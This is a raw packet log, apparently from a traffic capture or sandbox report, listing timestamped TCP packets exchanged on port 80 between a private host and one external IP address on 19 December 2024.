Dec 19, 2024 08:52:37.860414982 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.860426903 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.860527992 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.861063957 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.861092091 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.861110926 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.861469030 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.862178087 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.862358093 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.862371922 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.862410069 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.863128901 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.863560915 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.863639116 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.863639116 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.863770962 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.864437103 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.864603043 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.864615917 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.864676952 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.865292072 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.865379095 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.866372108 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.866584063 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.866638899 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.866889000 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.866902113 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.866964102 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.867572069 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.867584944 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.867691994 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.868841887 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.869057894 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.869142056 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.869364977 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.869378090 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.869426012 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.870085955 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.870099068 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.870186090 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.870991945 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.871227026 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.871283054 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.871545076 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.871886969 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.872287989 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.872299910 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.872365952 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.872502089 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.873244047 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.873418093 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.873487949 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.873821974 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.874130964 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.874273062 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.874471903 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.874639988 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.874882936 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.875391960 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.875586987 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.875633001 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.876200914 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.876332045 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.876404047 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.877031088 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.877238035 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.877310991 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.877557039 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.877913952 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.878474951 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.878546953 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.878648043 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.879647017 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.879702091 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.879862070 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.879889965 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.880168915 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.880178928 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.880228996 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.880847931 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.881182909 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.881238937 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.881980896 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.882185936 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.882252932 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.882510900 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.882523060 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.882553101 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.883223057 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.883580923 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.884190083 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.884257078 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.884418011 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.884735107 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.884782076 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.885104895 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.885148048 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.885462999 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.885750055 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.886373043 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.886473894 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.886584044 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.887309074 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.887368917 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.887368917 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.887528896 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.887804985 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.888168097 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.888267994 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.888559103 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.888868093 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.888927937 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.889822006 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.890230894 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.890295029 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.890343904 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.890690088 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.891074896 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.891084909 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.891140938 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.891275883 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.892393112 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.892575979 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.892586946 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.892637968 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.893491983 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.893615961 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.893626928 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.893649101 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.893666029 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.894923925 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.895014048 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.895025015 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.895224094 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.895685911 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.895741940 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.896089077 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.897173882 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.897407055 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.897749901 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.897762060 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.898073912 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.898102999 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.898123980 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.899481058 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.899739981 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.899801016 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.900032997 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.900083065 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.900401115 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.901923895 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.902076960 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.902245998 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.902688026 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.902736902 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.902884007 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.904139996 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.904402018 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.904616117 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.905292034 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.905366898 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.905391932 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.906469107 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.906670094 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.906987906 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.907720089 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.907773018 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.908004999 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.908812046 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.909126043 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.909164906 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.910300970 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.910377979 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.910429955 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.911276102 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.911365032 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.911462069 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.912261963 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.912842035 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.913022995 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.913044930 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.913477898 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.913701057 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.913760900 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.915385008 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.915433884 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.915544987 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.915930986 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.916286945 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.916666031 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.917952061 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.917999029 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.918169975 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.918469906 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.918483019 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.918606043 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.920449018 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.920635939 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.920650005 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.920690060 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.920708895 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.921356916 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.922837019 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.923043013 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.923196077 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.923362970 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.923376083 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.923417091 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.925362110 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.925751925 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.925765038 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.925869942 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.928147078 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.928211927 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.928419113 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.930701971 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.930746078 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.930948973 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.933218956 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.933265924 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.933450937 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.935765982 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.935821056 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.936136007 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.938355923 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.938402891 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.938566923 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.940927982 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.941101074 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.941145897 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.943559885 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.943608046 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.943707943 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.946026087 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.946074009 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.946250916 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.948563099 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.948620081 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.948762894 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.951173067 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.951221943 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.951282024 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.953700066 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.953758955 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.953896999 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.956278086 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.956348896 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.956428051 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.958817005 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.958873034 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.959331036 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.959378958 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.961400032 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.961447954 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.961503029 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.962464094 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.962557077 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.962683916 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.962881088 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.963360071 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.963428020 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.963885069 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.963928938 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.964081049 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.964092970 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.964751005 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.964786053 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.965112925 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.965559959 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.965750933 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.966175079 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.966401100 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.966444969 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.966697931 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.966710091 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.966747046 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.967374086 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.967752934 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.967804909 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.968359947 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.968743086 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.968921900 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.969047070 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.969135046 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.969204903 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.969666004 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.969881058 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.969935894 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.970500946 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.970870972 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.970909119 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.971515894 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.971561909 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.971863031 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.971877098 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.972572088 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.972618103 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.973161936 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.973315001 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.973350048 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.973788023 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.973977089 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.974272966 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.974342108 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.974385023 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.974668980 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.975213051 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.975356102 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.975402117 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.975960970 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.976320028 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.976382017 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.976639032 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.976679087 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.976905107 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.977363110 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.977559090 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.977602005 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.978143930 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.978353024 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.978393078 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.979183912 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.979249954 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.979406118 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.979418039 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.980113983 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.980155945 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.980420113 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.980773926 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.980829000 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.981400967 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.981596947 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.981638908 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.981951952 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.982000113 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.982398987 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.982713938 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.982969999 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.983017921 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.983576059 CET	80	49730	147.45.47.15	192.168.2.4
